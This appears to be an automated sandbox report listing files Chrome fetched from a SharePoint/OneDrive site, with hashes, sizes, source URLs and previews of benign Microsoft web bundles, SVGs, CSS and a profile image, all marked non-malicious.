                                                          Entropy (8bit):4.1065941361756195
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:48D80779B127989CCFC24C653ECD992A
                                                          SHA1:5947B7FB6DDFE3CF63CF8BB05083E1DA605C302C
                                                          SHA-256:FA1A12DF1ACB58EE03C25D6A2F0145A48EE8F83AEBEB7D606402B6B68FE29E36
                                                          SHA-512:1FB8F7B9ED87478FC58242EF25A5A9EFE98A45852DB8E998DFA66AF41BE42664B3D722E7A6AACA4CBA05BEE57BE09F21824BC044F2E62BF2FFABEB5388D2E398
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_meeting_dark.svg
                                                          Preview:<svg width="220" height="222" viewBox="0 0 220 222" fill="none" xmlns="http://www.w3.org/2000/svg">..<path opacity="0.2" d="M184.395 186.005C229.419 157.416 217.516 110.412 197.766 70.3088C191.115 56.8041 192.668 31.8932 180.134 22.2853C155.094 3.08652 137.077 8.57249 122.146 26.4808C115.515 34.4355 102.273 41.9194 86.9565 36.7996C71.64 31.6797 22.873 31.6989 51.7818 90.6228C72.0567 131.944 41.4524 130.02 19.72 145.87C-1.62315 161.434 24.5621 193.375 50.3931 202.514C81.6088 213.56 155.576 204.305 184.395 186.005Z" fill="#797673"/>..<path d="M199.28 56.3973L199.184 56.3877C202.477 60.7089 205.82 65.034 209.212 69.363C206.125 91.3463 204.303 113.492 203.755 135.688C203.751 136 203.681 136.307 203.551 136.59C203.421 136.873 203.233 137.125 203 137.33C202.767 137.535 202.493 137.688 202.197 137.779C201.902 137.87 201.59 137.896 201.283 137.857C182.475 136.003 163.682 134.148 144.902 132.293C144.519 132.252 144.15 132.123 143.824 131.916C143.996 132.372 144.29 132.77 144.673 133.068C145.056
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (65308), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):273327
                                                          Entropy (8bit):5.703783952804962
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E0E9238D3FAFBA7CDB7071096D47C0BF
                                                          SHA1:EFB5F497907A751CACC1EC2BDE2C58B44C4E2474
                                                          SHA-256:4DC5E96990E3F7096D8C21688F71448EAB116737868BE36A3D830BE88E91FFEC
                                                          SHA-512:F299A2BB5E6AFB0462F1C1D82BBF9ED74706C51800932B0DECE8E1F3F2FBB0E35EEED37F96E97DEE6530420059B590EE38CD5526816A0978C3068D249374FB5E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_core_start"),function(){var e,t,n,o,r,i={61448:function(e,t,n){"use strict";var o;n.d(t,{f:function(){return o}}),function(e){e.depth0="0 0 0 0 transparent",e.depth4="0 1.6px 3.6px 0 rgba(0, 0, 0, 0.132), 0 0.3px 0.9px 0 rgba(0, 0, 0, 0.108)",e.depth8="0 3.2px 7.2px 0 rgba(0, 0, 0, 0.132), 0 0.6px 1.8px 0 rgba(0, 0, 0, 0.108)",e.depth16="0 6.4px 14.4px 0 rgba(0, 0, 0, 0.132), 0 1.2px 3.6px 0 rgba(0, 0, 0, 0.108)",e.depth64="0 25.6px 57.6px 0 rgba(0, 0, 0, 0.22), 0 4.8px 14.4px 0 rgba(0, 0, 0, 0.18)"}(o||(o={}))},2403:function(e,t,n){"use strict";n.d(t,{I:function(){return c}});var o=/[\(\[\{\<][^\)\]\}\>]*[\)\]\}\>]/g,r=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,i=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,s=/\s+/g,a=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):8119
                                                          Entropy (8bit):4.587721068903943
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D3E99DC5C534B41FAC830E37F9C7CF79
                                                          SHA1:3361024E24A7A289D7456C752A815204B5089086
                                                          SHA-256:DD83F95D0017AACB701E9681ED4528E949419F34B6E85B7A7A44D861500DCDD0
                                                          SHA-512:FF05AC4845DE73B166F54E6604EB68187E49F6CE599073633DB81B0804EE4C687BE04AD0826FABB7C0D619B353BE9DEABF009F8B9960B72C1C20355DD9BAEBD6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_folder_v2.svg
                                                          Preview:<svg id="GRAPHICS" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="208" height="208" viewBox="0 0 208 208"><defs><radialGradient id="radial-gradient" cx="795.872" cy="-34.38" r="28.576" gradientTransform="matrix(0.984, -0.176, 0.178, 0.992, -701.145, 258.267)" gradientUnits="userSpaceOnUse"><stop offset="0.338" stop-color="#797673"/><stop offset="0.513" stop-color="#979592"/><stop offset="0.701" stop-color="#b1afac"/><stop offset="0.869" stop-color="#c1bebc"/><stop offset="1" stop-color="#c6c4c2"/></radialGradient><linearGradient id="linear-gradient" x1="-131.655" y1="376.681" x2="-175.845" y2="285.033" gradientTransform="translate(263.822 -169.877) rotate(5.61)" gradientUnits="userSpaceOnUse"><stop offset="0.002" stop-color="#f5b453"/><stop offset="0.295" stop-color="#fed494"/></linearGradient></defs><path d="M150.127,192.54s85.6-47.916,48.465-73.7C163.474,94.45,219.258,73.41,195.977,43.19c-43.184-56.056-69.869-8.681-124.782-7.226-83.687,2.218-81.1
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (37567)
                                                          Category:dropped
                                                          Size (bytes):281279
                                                          Entropy (8bit):5.336766986578332
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:927654BB796E935BC5C646ED8A267BE4
                                                          SHA1:17EA82F65537EE3489330BD73788459909C71B41
                                                          SHA-256:E849006C76B10ED5D012E1858837F475B7AFC5EBDDB258A4F6EA1B377680EFEF
                                                          SHA-512:277CBFE739677993877E74AE38E7C112B0E3DFE2C41231694D59347621CFFE3903820D84695C43179CB84F06048320EFBAB5DAF728672D1DC0920E105F3B4ED2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[182],{2617:function(e,t,n){"use strict";n.d(t,{a:function(){return d}});var a=n("react-lib"),i=n(2618),r=n(115),o=n(114),s=n(2619),c=n(173);const d=a.forwardRef((e,t)=>{const n=(0,i.a)(e,t);return(0,s.a)(n),(0,c.c)("useInputStyles_unstable")(n),(e=>((0,o.a)(e),(0,r.a)(e.root,{children:[e.contentBefore&&(0,r.b)(e.contentBefore,{}),(0,r.b)(e.input,{}),e.contentAfter&&(0,r.b)(e.contentAfter,{})]})))(n)});d.displayName="Input"}.,2618:function(e,t,n){"use strict";n.d(t,{a:function(){return d}}),n("react-lib");var a=n(2588),i=n(563),r=n(1600),o=n("fui.core_932"),s=n(134),c=n(2170);const d=(e,t)=>{e=(0,a.b)(e,{supportsLabelFor:!0,supportsRequired:!0,supportsSize:!0});const n=(0,c.b)();var d;const{size:l="medium",appearance:u=(null!==(d=n.inputDefaultAppearance)&&void 0!==d?d:"outline"),onChange:f}=e,[p,m]=(0,i.a)({state:e.value,defaultState:e.defaultValue,initialState:""}),_=(0,r.b)({props:e,primarySlotTagName:"input",excludedPr
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (52343)
                                                          Category:downloaded
                                                          Size (bytes):52378
                                                          Entropy (8bit):5.50919795709142
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:6789520F0E2B1BA1420CD273A9358B06
                                                          SHA1:A923D0C4761B9C6161EE613C525EE7E02A4CBE42
                                                          SHA-256:116B222BEA45267E72DA59C6F03370EDC9FE638420705969C225066F93AE3F08
                                                          SHA-512:1B95816C425E0BBFEB4D0A607FBF373D1E7CA50EE374E809E935378DE17C80E5567666449DFC857542BEF2AB260858A4B136DD47444F1C5C2FE745DFA5D51579
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp.aria/odsp.aria.lib-ab227069.js
                                                          Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.aria.lib"],{"aria-lib":function(e,t){var n,a,i,r,o;(n||(n={})).version="2.9.0",function(e){!function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e[e.BT_LIST=11]="BT_LIST",e[e.BT_SET=12]="BT_SET",e[e.BT_MAP=13]="BT_MAP",e[e.BT_INT8=14]="BT_INT8",e[e.BT_INT16=15]="BT_INT16",e[e.BT_INT32=16]="BT_INT32",e[e.BT_INT64=17]="BT_INT64",e[e.BT_WSTRING=18]="BT_WSTRING",e[e.BT_UNAVAILABLE=127]="BT_UNAVAILABLE"}(e.BondDataType||(e.BondDataType={})),function(e){e[e.MARSHALED_PROTOCOL=0]="MARSHALED_PROTOCOL",e[e.MAFIA_PROTOCOL=17997]="MAFIA_PROTOCOL",e[e.COMPACT_PROTOCOL=16963]="COMPACT_PROTOCOL",e[e.JSON_PROTOCOL=21322]="JSON_PROTOCOL",e[e.PRETTY_JSON_PROTOCOL=2
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1318)
                                                          Category:downloaded
                                                          Size (bytes):1323
                                                          Entropy (8bit):5.122151666406141
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3E219DEA747BE1FD669A0BF78394AA72
                                                          SHA1:657513C7234AC1DE2D19A9BCDC19F3DCB35FC7AF
                                                          SHA-256:2488A936A2B260B029FDF8A84224206818468C659B04B123F7633C174B3EBA71
                                                          SHA-512:D113732E4A9D4E4BB566DD98AF59D66593A728406C1C0F91081651FE2CDB48A93B8A1AC907F54689478CC3914C4D215C392EAF59D6C4BF54AF2C4C8EACCCCF80
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/100.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[100],{803:(e,t,n)=>{n.r(t),n.d(t,{presenceSelectionUtilsKey:()=>o});var a=n("tslib_538"),i=n("odsp.util_517"),r=n(7),o=new i.lh({name:"presenceSelectionUtils",factory:{dependencies:{listDataStateStore:r.a},create:function(e){var t,n=e.listDataStateStore,i=new Map,r=new Map,o=null===(t=n.state)||void 0===t?void 0:t.listRenderData.schema,s=function(){null==o||o.fields.forEach(function(e){var t=e.internalName,n=e.ID;i.set(t,n),r.set(n,t)})};s();var c=n.onUpdate("listRenderData",function(e){e.detail.schema&&e.detail.schema!==o&&(o=e.detail.schema,s())});return{instance:{formatSelection:function(e){if("cellRange"===e.type){var t=e.type,n=e.beginRowKey,r=e.endRowKey,o=e.beginColKey,s=e.endColKey;return n===r&&o===s?{type:t,beginRowKey:n,beginColKey:i.get(o)||"",endRowKey:void 0,endColKey:void 0}:(0,a.q5)((0,a.q5)({},e),{beginColKey:i.get(o)||"",endColKey:i.get(s)||""})}return e},revertSelection:function(e){if("cell
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4825)
                                                          Category:downloaded
                                                          Size (bytes):4830
                                                          Entropy (8bit):5.2780591057741555
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9DCB0F6AADE2AF1158AB817677EFF62D
                                                          SHA1:84F649C8D55A52DB4F404C382F329C2D087F4294
                                                          SHA-256:F7AEC9CFE52B8AB3C0AE7BD72D2FA67D9613384D08E3B44BF27CF8C964AE98A1
                                                          SHA-512:64AA59160E5C5CA8CECE29F435C41D3ACE18A6C42887746445566E6E5A559101CFF89CD742F148563244B0AD613683453867DF3479F7BD35F06DBA4F35DECAD9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/56770.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[56770],{756770:(e,t,n)=>{n.d(t,{jt:()=>y});const a=["Top","Right","Bottom","Left"];function i(e,t,...n){const[i,r=i,o=i,s=r]=n,c=[i,r,o,s],d={};for(let n=0;n<c.length;n+=1)(c[n]||0===c[n])&&(d[e+a[n]+t]=c[n]);return d}function r(...e){return i("border","Width",...e)}function o(...e){return i("border","Style",...e)}function s(...e){return i("border","Color",...e)}const c=["none","hidden","dotted","dashed","solid","double","groove","ridge","inset","outset"];function d(e){return c.includes(e)}const l=e=>"number"==typeof e&&!Number.isNaN(e),u=e=>"auto"===e,f=["content","fit-content","max-content","min-content"],p=e=>f.some(t=>e===t)||(e=>"string"==typeof e&&/(\d+(\w+|%))/.test(e))(e),m=/var\(.*\)/gi,_=/^[a-zA-Z0-9\-_\\#;]+$/,h=/^-moz-initial$|^auto$|^initial$|^inherit$|^revert$|^unset$|^span \d+$|^\d.*/;function b(e){return void 0!==e&&"string"==typeof e&&_.test(e)&&!h.test(e)}const g=["-moz-ini
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):14730
                                                          Entropy (8bit):4.846925666070396
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FE46325BF6167047462E10177C5D208F
                                                          SHA1:B54445BCCC3F97503835D374A8BEEDE48759723D
                                                          SHA-256:E46A8F98BDF831BBDCA0057CD9F046E6454C85478BDE2202A8FAEE6BDBF7B683
                                                          SHA-512:48ABC256D7AFE259A19624518F7C18DEF32759886CCC94FA41D02DEBD2729171ECA2B2621A4DE0B58351D19FDAD33C6D2CA2FB91EB03A1710478143AC76D3F15
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/fabric-cdn-prod_20240610.001/onedrive-assets/onedrive-font-face-definitions.css
                                                          Preview:./* Leelawadee UI (Thai and Lao) does not have a 'light' weight, so we the 'semilight' weight instead. */.@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 100;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 300;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-regul
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):1500
                                                          Entropy (8bit):7.676946629163264
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:654254813B3B6CF7342CBE7AF529AC20
                                                          SHA1:1DC0E0A3CA5A453DFEFFEBD9A749551FCBA21AC6
                                                          SHA-256:FA317F1A5CF832C5BF7A5344322DFFAC09EAC2A03B4312E821B827C873799FE0
                                                          SHA-512:1A06F8DE9CC32F190039DBF63A7BCF71C6A2DFB4B983BC8CDEEA8C6239DD659B2E1E5CEDEEF3EBA95CD1F7AB21347AE45C492CD3B9F0844D5980360EA53DC9C6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://myarrowleaf1-my.sharepoint.com/_layouts/15/userphoto.aspx?size=M&accountname=marge.penrod%40myarrowleaf.org
                                                          Preview:.PNG........IHDR...`...`......w8....sRGB.........gAMA......a.....pHYs..........o.d...qIDATx^..n.0.....f.{C..{Ez....= 9.+.6.h....i}k-EQ.U.TL..#.aG.......;..v. ..@....#.aG....]w.z{{M..._S.SOV..........K....wsxxh...Mss3.9Z.........C......eZ[[...fu...........W...`.....h.*.}}}.....a1:??W.4..088...e....tuu...........p........A^_............ijj".(........!].b..(.d)....$.....e..izzzR.`.....VVV..-..y9V.......B..i.....v.d.8..8-.............8.........yI/.......[.!.....M...$..2;...={.:.j).'.......[.!,.8......&a=B..ev..Hj.d....w..E?....m=...2;...]{.:.. *N...X^^...C...8...`dd......2;.m....92N.....TC!..R1rY...^.w=<<..qZ....1H....X:..........b.p.R].......-...Z..sZ........G;,|...&.(..i`Y]...A.!eq.0..q.m.mmmd.RV....W.;_.=...$.1.a...h8..5..a.A?.-.iV.....V.y....gUm.iV..j........*.9OMM.?.Y5+.....IZ......brD...............e...%.....D.y85..-..P.[.K....N0%..@8.L....7....[....E.4.CCC^....9...o......2.....[..~...D}n^.7.ObH......Q..PcA.+.NNN.]....0To..M]#...qS|C...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1539)
                                                          Category:downloaded
                                                          Size (bytes):3083
                                                          Entropy (8bit):5.160239488699842
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:DAAA7FD4A827475C5026465F6CDA99FC
                                                          SHA1:B1853F364A9066DAC99220B9DE40C4F13BA1AE70
                                                          SHA-256:B8D3DCBDD0C4B8B1110CBF7DADA9A3A9A747AF3EAF51644694E701D6F6B4D322
                                                          SHA-512:0C73B5E359E2601157BD531F69E7AC85A5D75523A427451E1C67D932220EA3B9791B6234594D154BF7245B454C426A5AD85B45A9D718DBF33163FD6DAFF88F1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/102.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[102],{1040:(e,t,n)=>{n.d(t,{a:()=>s});var a=n("tslib_538"),i=n(22),r=n(233),o=function(e){function t(t,n){var a=e.call(this,{webAbsoluteUrl:n.pageContext.webAbsoluteUrl,encodeWebAbsoluteUrl:n.encodeWebAbsoluteUrl})||this;return a._pageContext=n.pageContext,a._shouldEncodeWebAbsoluteUrl=n.encodeWebAbsoluteUrl,a._itemUrlHelper=n.itemUrlHelper,a}return(0,a.e2)(t,e),t.prototype.webByUrl=function(e){return this.webByItemUrl(this._itemUrlHelper.getUrlParts(e))},t.prototype.webByItemUrl=function(e){var t=e.siteRelation,n=e.isCrossDomain,a=e.fullItemUrl,r=this;return(n||t===i.d.crossSite)&&(r=r.method("SP.RemoteWeb",a)),r.segment("web")},t.prototype.listById=function(e,t){return this.webByItemUrl(e).segment("lists").method("GetById",t)},t.prototype.clone=function(){return new t({webAbsoluteUrl:this._pageContext.webAbsoluteUrl},{pageContext:this._pageContext,itemUrlHelper:this._itemUrlHelper,encodeWebAbsoluteUrl:this.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (45604)
                                                          Category:downloaded
                                                          Size (bytes):139660
                                                          Entropy (8bit):5.271702307452142
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:0A1478962297755C5D2610F5A3168F41
                                                          SHA1:408BDEFA21D72C8B121F6ECECDBF7811E52A719F
                                                          SHA-256:B56AC7C53CCCB3C19CA30E54AE4AFC5C484B3A259BB27C93841D97556FC2D1B4
                                                          SHA-512:E9E421E6F1422D4CD7A1122F42BD63AA057CDE8467E5094E53EF8D61076C221992B6C35A8591B58E270B2FA1133347756EF3DE8E5C1938E03023F4D14A715134
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/191.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[191],{1970:(e,t,n)=>{n.r(t),n.d(t,{assignItemsToGroupToastsResourceKey:()=>F});var a,i=n("tslib_538"),r=n("odsp.util_517"),o=n(1096),s=n(1094),c=n(1049),d=n(1158),l=n(1311),u=n(1078),f=n(1025),p=n(1069),m=n(1157),_=n(1041),h=n(1015),b=n(1105),g=n(2742),v=n(2056),y=n(1089),S=n(1128),D=n(1131),I=n(1543),x=n(1122),C=((a={})[c.d.started]=function(e,t){return(0,r.Z_)((0,r.at)(g.c,g.d,e)||"",e,t)},a[c.d.completed]=function(e,t){return(0,r.Z_)((0,r.at)(g.a,g.d,e)||"",e,t)},a[c.d.failed]=function(e,t){return(0,r.Z_)((0,r.at)(g.b,g.d,e)||"",e,t)},a[c.d.canceled]=function(e,t){return(0,r.Z_)((0,r.at)(g.b,g.d,e)||"",e,t)},a),O=(0,y.b)(function(){return function(e){e((0,S.b)(v.b,D.a)(E)),e((0,S.b)(v.b,I.c)(w))}});function w(e,t){return{reportMode:I.a.pin}}function E(e,t){var n=t.itemKey,a=(0,x.d)(e,t),r=a.phase,o=a.count,s=C,c=e.demandItemFacet(f.a,n),d=c&&c.itemKeys,l="",u="";if(d&&d.length>0){var m=e.demandItemFacet(v.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):87
                                                          Entropy (8bit):4.674522374636856
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1629709B420FE5981924392917611397
                                                          SHA1:9925539FA01891AF3845AD86A3B0CA311A19AE4D
                                                          SHA-256:63386A3F971A5A0189426BC682D9954C68BEBAEA78124543541F81F70A05BDDC
                                                          SHA-512:7DA4ED173A42984C75B2A211CF4424AD3DA22E46281CDE7EFF1935DF5B1EE58EF3C3EF27F20DD61701394E74F2DAF19CA7A992A81201163A8E8C91E02528C014
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{"errors":[{"message":"A query is required.","extensions":{"code":"EXECUTION_ERROR"}}]}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (45741)
                                                          Category:downloaded
                                                          Size (bytes):47181
                                                          Entropy (8bit):6.172699328885304
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A72399F37B0A7AD283E6F1007B9BAD22
                                                          SHA1:42A1682E05E32EB25E5CF0A3D7BBBBD86344B657
                                                          SHA-256:055E1B505F4B664DC199F4B20022177B19A401F3E08700E195607B4792B636FC
                                                          SHA-512:AAA95F905CD011676CA8A3503F14C333276C48ED2A2E309537C5A821536E8C9F7924F8221B699587AE962B071D777B40B40DFB07E843FF3BE115998999BE7D17
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/23363.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[23363],{536318:(e,t,n)=>{n.d(t,{t:()=>c});var a=n(171125),i=n(539155),r=n.n(i),o=n(904877),s=n(632367),c=function(e){function t(){var t=null!==e&&e.apply(this,arguments)||this;return t.state={},t}return(0,a.__extends)(t,e),t.prototype.render=function(){return void 0!==this.state.failure&&void 0!==this.props.fallback?this.props.fallback(this.state.failure):this.props.children},t.prototype.componentDidCatch=function(e,t,n){void 0===n&&(n=!0);var a=(0,o.PP)(e);try{this.props.onCatch&&this.props.onCatch({error:a,info:t})}catch(e){n&&this.componentDidCatch(new s.K(a,(0,o.PP)(e)),t,!1)}finally{n&&void 0===this.state.failure&&this.setState({failure:{error:a,info:t}})}},t}(r().Component)}.,632367:(e,t,n)=>{n.d(t,{K:()=>i});var a=n(171125),i=function(e){function t(n,a){var i=e.call(this,a.message)||this;return i.originalError=n,i.handlingError=a,i.stack=a.stack,void 0!==typeof Object.setPrototypeOf&&
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (41526)
                                                          Category:dropped
                                                          Size (bytes):145469
                                                          Entropy (8bit):5.560386369792113
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D5F153357E44E265D799A5DDACC686BE
                                                          SHA1:DEA3BA49B48E484D9808377206CF93B5A5A9BFA5
                                                          SHA-256:342D6536EFFE15A6D78EA2A2A12035DB40CAF4952D4717CDB3C81458BFDC5C9A
                                                          SHA-512:A8E4456A2B5D6C7EF6118777917106014B2DF084A36BBD1B3AB283277FAE3BC8EEDE970D27CA3CAA9D488B5814A54685C8CF9592817D8230F9809F72D5084E3D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview://BuildVersion 1.20241108.4.0.var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_bootstrapper_start"),function(){var e,t,n,a,r={7115:function(e){e.exports="data:font/woff;charset=utf-8;base64,d09GRgABAAAAAAmoAA4AAAAAExwAA5R8AAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABRAAAAEgAAABgMWd7ZGNtYXAAAAGMAAAAPQAAAVLnkt3NY3Z0IAAAAcwAAAAgAAAAKgnZCa9mcGdtAAAB7AAAAPAAAAFZ/J7mjmdhc3AAAALcAAAADAAAAAwACAAbZ2x5ZgAAAugAAAGhAAADZMkacS9oZWFkAAAEjAAAADIAAAA2AQjyc2hoZWEAAATAAAAAFQAAACQQAQgDaG10eAAABNgAAAAMAAAADA0qASZsb2NhAAAE5AAAAAoAAAAKAiQA2G1heHAAAATwAAAAHQAAACAAIgIObmFtZQAABRAAAAP4AAAJ+pGb8VNwb3N0AAAJCAAAABQAAAAg/1EAe3ByZXAAAAkcAAAAiQAAANN4vfIOeJxjYGH3YpzAwMrAwDqL1ZiBgVEaQjNfZEhjEuJgZeViZGIEAwYgEGBAAN9gBQUGh+eKXx5wgPkQkgGsjgXCU2BgAADOIQhyeJxjYGBgZoBgGQZGBhDwAfIYwXwWBgMgzQGETAwMzxWfV3958P8/giXxUKKNWxmqCwwY2RhGPAAA9FQPGwAAAHicY9BiCGUoYGhgWMXIwNjA7MB4gMEBiwgQAACqHAeVeJxdj79Ow0AM
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (8565)
                                                          Category:downloaded
                                                          Size (bytes):199565
                                                          Entropy (8bit):5.323425401796579
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F7A57BD012C112D38E3D268AD37B451C
                                                          SHA1:39C03F8579B51046D695D1EE2126EC625A812A46
                                                          SHA-256:B731BCD28B2F38AFA691D892A732495FA8CC635791F8BA491F85AA7357EFD124
                                                          SHA-512:868763EB8226F8DCAED058888AD946EB0A05D5A72A43E7B14B434AE5FD5524EC4182A6FAF4D5B56CF22CE58635CAEF8732A519EF535353630B72AED879B55028
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/104.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[104,26,101],{1018:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(1672);t.isDocumentFragment=a.default;var i=n(1673);t.isHTMLElement=i.default;var r=n(1674);t.isHTMLOListElement=r.default;var o=n(1675);t.isHTMLTableCellElement=o.default;var s=n(1676);t.isHTMLTableElement=s.default;var c=n(1677);t.isNode=c.default;var d=n(1678);t.isRange=d.default;var l=n(1107);t.safeInstanceOf=l.default}.,1672:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(1107);t.default=function(e){return a.default(e,"DocumentFragment")}}.,1673:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(1107);t.default=function(e){return a.default(e,"HTMLElement")}}.,1674:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(1107);t.default=function(e){return a.default(e,"HTMLOListElement")}}.,1675:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(1107);t.default=fu
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (43609)
                                                          Category:dropped
                                                          Size (bytes):56057
                                                          Entropy (8bit):5.504558473098047
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D73162F3B6A2ED0240496C1FF4D8D7F4
                                                          SHA1:6C175CAA78DD638226194F2518820F99983EC10F
                                                          SHA-256:37B5533617A12681B8E754152B713C2DE07E229D78053BBCD131279E0EF297DE
                                                          SHA-512:EE746605A341955CD136C27E4CC1CE30794FCC1015E28D1DDF1BF55376F39BFB12230D33F499F5F0BD74D053B830F651ECEF339D88A4AB9D9E3E9459F1A6BAC4
                                                          Malicious:false
                                                          Reputation:unknown
